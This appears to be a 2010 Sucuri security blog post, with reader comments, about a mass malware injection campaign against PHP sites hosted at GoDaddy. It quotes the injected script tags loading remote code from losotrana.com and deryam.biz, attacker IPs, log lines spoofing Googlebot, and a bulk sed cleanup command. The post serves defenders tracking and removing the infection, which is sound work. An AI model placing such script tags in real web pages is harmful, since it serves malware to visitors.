Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src=”http://losotrana.com/js.php”></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same domain as holasionweb.com used on the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from: 178.32.42.1, which is also faking Google’s referer:

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • http://www.blogger.com/profile/08850640338059899859 ReadJunk

    I'm seriously done with Go Daddy. e-mail me at bryan@readjunk.com if you have any good suggestions for a hosting company! thanks!

  • snxuev

    it seem request to ->
    www3.burhot33-td[dot]net ->
    http://www.welcomewavedotnet/vidpage.php |Tsunamee[dot]net – A Web Media Experience | -> /'
    http://www.youtubedotcom/watch?v=maCSZFEPwzc ->
    http://www.defendthehousedotcom/
    may i'm wrong?
    remove this commnt if i'm wrong

  • http://bourgy.com Bourgy

    I am done too. The code hit me 3 hours ago. Unfortunately I didn't use the sucuri script because I heard of the space error.

    I used another script I saw here but that needs you to click OK. There is no telling how many people's computers I may have infected. This thing is costing me thousands of visitors

  • http://www.kindredscents.com soy candles

    just got off the phone with Go Daddy and they are so flipant about it. they knew it was going on and waited until I said something to them before they ran some script that totally blew away my footer.. so be careful when they run the script.

    fact is this happened to me twice and they could of told me the last time that it was an issue and i wouldnt be spending my morning fixing this.

  • http://www.blogtips.org Peter

    hilarykneber@yahoo.com hey? Google it… This is a name which got famous in the hackers world a while ago…

    PS: in your script, you might put a
    set_time_limit(0); ?

    would that not solve scripts being cleaned up, but left with a blank line?

    Peter

  • http://www.blogger.com/profile/17504080918546577656 the insider

    1st it was a base64 encoded code inserted on the top of every page… now it is this stupid losotrana thing… And godaddy refuses to help…
    anybody found a cure to this ??!!!

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Peter: Good idea, fixed the script.

  • http://www.blogger.com/profile/03888150968785200559 The Lonely Conservative

    This time I used your sucuri clean up script and it seems to have worked. This is getting so annoying. I lose readers every time.

  • Anonymous

    Godaddy answer to my new ticket:

    "Thank you for contacting the Hosting Security Team.

    A number of websites running PHP applications, such as WordPress and Joomla, have been affected by malware. These attacks have affected many hosting providers, including Go Daddy. They are a serious threat and we're committed to eliminating them.

    While transparency is something we value, when Internet users release information about the attacks, such as the code used to create them, it really only helps the hackers. As they gain clues into our investigation, it gives the attackers more power.

    The origin and characteristics of these attacks continue to change from day to day. Thanks to the efforts of our team, we've kept the number of affected sites to a minimum (fewer than a tenth of 1 percent of the sites we host). This means we can devote a lot of attention to the compromised websites.

    Your protection is our top priority. Our team of security experts is working around the clock to monitor our systems, investigate incidents and implement counter-measures to neutralize potential threats. You can find information about who is affected, what the attack is, and ways you can fix the problem here: http://community.godaddy.com/godaddy/whats-up-with-go-daddy-wordpress-php-exploits-and-malware/

    Go Daddy appreciates your concern on this critical issue. We're here to help, and are making every effort to answer your questions and concerns.

    Our goal is to help you keep your website safe and secure."

  • Anonymous

    Sucuri script still works perfectly, my site was infected and I have already cured with this script.
    Thank you very much.

  • Anonymous

    http://www.x.com is paypal affiliate?

  • http://www.blogger.com/profile/13437851692972821584 AW

    Something has come back into my sites. As of a few hours ago. Yet,so far I've been able to run your script again. The malware didn't seem to run – so far.

  • http://www.blogger.com/profile/13437851692972821584 AW

    This went into my php files as of 18:33 (Japan time)

  • Anonymous

    anybody found a cure to this ??!!!

    Yes, toss our computers and modems and boxes and gadgets onto the curb for trash pickup and do something sane.

    This will instantly neutralize the hacker armies in one easy step and they'll have to find something else to do. Like hacking themselves.

  • Techlands

    if you have SSH access to your godaddy account running this from your html directory will strip out the infection

    find . -type f -name "*.php" -exec sed -i '/base64_decode/d' {} \;

  • Anonymous

    "if you have SSH access to your godaddy account running this from your html directory will strip out the infection"

    How are we to know your not a hacker?

  • Ipstenu

    Re the SSH suggestion it looks fine to me, but if you're being overly cautious (which I applaud), see http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

  • Anonymous

    Does anyone have:

    Hosting Configuration: 2.2
    PHP Version: PHP 5.x

    hacked?

    I have 2 host and the only one being hacked is the older:

    Hosting Configuration: 2.0
    PHP Version: PHP 4.x

    Can you cross-check info?

  • http://bourgy.com Bourgy.com

    Hosting Configuration: 2.0
    PHP Version: PHP 5.x

  • http://bourgy.com Bourgy

    Does it even make sense changing ftp and DB passwords this time.
    I just left it as is. I am tired

  • http://sincemydivorce.com Mandy

    I'm done with GoDaddy too – this is the fourth attack in less than three weeks. So done and so thankful for Sucuri.

    Moving to BlueHost today.

  • http://www.blogtips.org Peter

    I adapted one of the existing scripts into a PHP script that first lists the infected files, asks for confirmation to cure, and then lists the cured files…

    Slightly more userfriendly…:

    See this post: http://bit.ly/c2yGCP

    Peter

  • Anonymous

    I'm holding on to something I said earlier.
    They only have one FTP user with high privileges on the network and one php file is responsible for infecting the entire full FTP.
    Or a disgruntled employee, or competition from Godaddy support contract someone to do this.

  • http://www.blogtips.org p

    @anonymous,

    But even then, hosting companies should have those security measures in place to detect that loop hole, and close it.. It should not take 4 hacking series… and still no action.

    Peter

  • John

    I have a few Go Daddy hosting accounts and some where hacked and some weren't.

    I've also cross referenced a few friends who are on Go Daddy and all of us except for 1 has a folder in the root directory called, php_uploads.

    I wonder if there's a connection?

    Anyone else who was hacked have that?

    Strangely, the sites I have on GD which weren't hacked did not have that directory.

  • http://www.thehosthelpers.com rvtraveller

    For all those interested, I am fairly certain this is an issue with phpMyAdmin (which GoDaddy uses for database management).

    Hosting info:
    Go Daddy (2.1 configuration)
    PHP 5.x

    I was affected by the previous 2 attacks holasionweb and indesignstudio garbage. Both times I had the most recent version of phpMyAdmin on my account to manage databases without having to log in to my hosting control panel. During the first attack (prior to indesignstudio I believe), my phpMyAdmin copy was protected via htaccess/htpasswd. I removed this because of other work I was doing and the password requirement was getting in the way of something else I wanted to run in that same directory. During this time I had all my PHP files hacked twice inserting the base64 code at the top. After the second attack (to me), I re-password protected my phpMyAdmin directory AND I was not affected by this attack.

    I realize this isn't conclusive evidence of a particular vulnerability in phpMyAdmin, but in my experience, when phpMyAdmin wasn't password protected, I got hacked and when it was protected I did not.

  • http://bourgy.com Bourgy

    I have the php upload folder, I assume it's there for a reason.

    And rvtraveller, how do I password protect that

  • http://www.blogger.com/profile/16694816955747818794 Pemo Theodore

    I moved my blog last week from godaddy to the best hosting company. Great deals & incredible customer service. Check out my post http://www.ezebis.com/technology/hosting/

  • Anonymous

    After 2 hacks on Godaddy, I moved my site to Google App Engine which doesn't even run PHP (I had been planning to do this for months). Interestingly enough my logs show a request for —–_—–.php (I blanked out the letters), early on May 17, an obvious attempt at running the Godaddy hack. Of course they just got a 404 error this time! Bastards

  • Anonymous

    Found this thread and thank goodness. I was getting all paranoid about my local firewall and data having been compromised. Yep, happened to me too. I'm not sure how many hundreds of customers were hit with a malware attack from the script linking to www3.burhot33-td[dot]net ->

    Dam it GoDaddy!

  • http://bourgy.com Bourgy

    I had the burhot33 redirect too

  • Anonymous

    At godaddy.com – change premissions – to read only !!!. No write & execute. And you are free to go – no viruses.

  • Anonymous

    But if the attacker can impersonate you, he could change the permissions & do what he wants.

  • http://www.davidecanali.com dcanali

    So,
    this is the 3rd time I get infected.
    The second time they actually made it to inject the malicious payload in my pages, and I saw this request:

    178.32.124.20 – – [12/May/2010:00:45:54 -0700] "GET http://www.newdigest.com/function_boone.php HTTP/1.1" 200 113 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    The first and second time I was infected they were not so fast to call the script – I disabled it before their request.
    I've setup a cron job that monitors the hosting root directory for any file creation, and sends me information about it. Yesterday another file was created on my account, with my uid and gid (protection mask 420 – all my files and folders have 705 or 644).
    At that time only 1 user was logged in using ssh, and there were a bunch of active or idle FTP sessions on the server (normal users apparently).
    Nothing suspicious, apparently, even from the list of running processes.

  • Anonymous

    The problem in Godaddy continues…

    My wordpress file monitor detect another file put in my host by the hacker:

    This email is to alert you of the following changes to the file system of your website
    Timestamp: Thu, 20 May 2010 16:12:33 +0200

    Added:
    guilbert_being.php

    I deleted and all my files are ok…

  • Anonymous

    Hi,

    I am seriously worry about the long attack time (more than one week of work of hosting support teams…).

    I am a system administrator from spain and none of our customers are affected this time, but it a problem too…

    I want to offer all people that are investigating possible security holes an idea that i dont read in the blog or comments… Some months ago we detect some apache (and php?) threads and childs that they are kidnapped from another child. What mean this? Someone of the neighbour (a domain on same machine) can kidnap an apache thread (and childs) of another user and if it is combined with the apache privileges can put a file in another domain or can redirect user to another page…

    Take care about all running apache processes ;)

    This bug must be fixed but maybe there was not solved correctly.

    Good luck with your sites and remember that security of your sites begin in You :-)

  • Anonymous

    The latest GoDaddy nonsense:
    "While transparency is something we value, when Internet users release information about the attacks, such as the code used to create them, it really only helps the hackers. As they gain clues into our investigation, it gives the attackers more power."

    This is *such* BS. The hackers know EXACTLY what they're doing, they're not going to learn anything from sites like this one, the godsend Sucuri Security… It's the REST of us, the site owners and webmasters, who are the ones who need to know!

    WHY can't you solve this GoDaddy, and WHY have you tried to keep everything a secret while blaming US?

    After four years, I am DONE with GoDaddy. You failed YET AGAIN to protect my site/business this week, for the fourth time in two months, and that is one strike too many… Say goodbye to me and thousands of others, I am sure.

  • Anonymous

    Why does it not make sense that PHP is a bloated hunk of junk and PHP could be the reason that hackers are getting in. Its happening with more hosts than GoDaddy and other scripts other than WP. To me as a programmer I would be looking at PHP and where you are getting it from, better yet move to .ASP or .NET, attacked more, but hacked less and less is better for me.

  • http://bitsa.me greg

    I think you have it right looking seriously at PHP.
    My GoDaddy site was hit 3 times, first was an unrelated PHP contact form (not in the root folder), then a WordPress site that just melted and finally a Modx rebuild of my blog was hit while I was online in the manager interface.
    All in 3 days, any static HTML was untouched, I am not a PHP programmer but a language that is loosely typed, uses global variables and regular expressions that are impossible for a human to read has got to have a lot of soft entry points, especially on a shared server.
    Apart from looking for a dedicated virtual server, I have pulled out the Java and Ruby tutorials for a refresher.
    It's much harder having to code without simple frameworks and more expensive delivering the end result but I for one have decided PHP on shared hosting is only for sites that are no big deal if I loose them.
    Any small client sites I leave PHP out of the mix if I can.

  • Anonymous

    Let me know when WordPress releases a version without PHP.

  • Anonymous

    One of my websites has been attacked .the following line was added to my site:
    script src=http://deryam.biz/wapchat/photos/umumi.php
    the website is hosted at godaddy iis . i think it is the same problem isn't it?

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net
  • Howard

    My GoAwayDaddy account has been compromised and GoDaddy is not being helpful at all.
    Stay away from GoDaddy!!

  • Pingback: Yet another series of attacks – This time using whereisdudescars.com | Sucuri()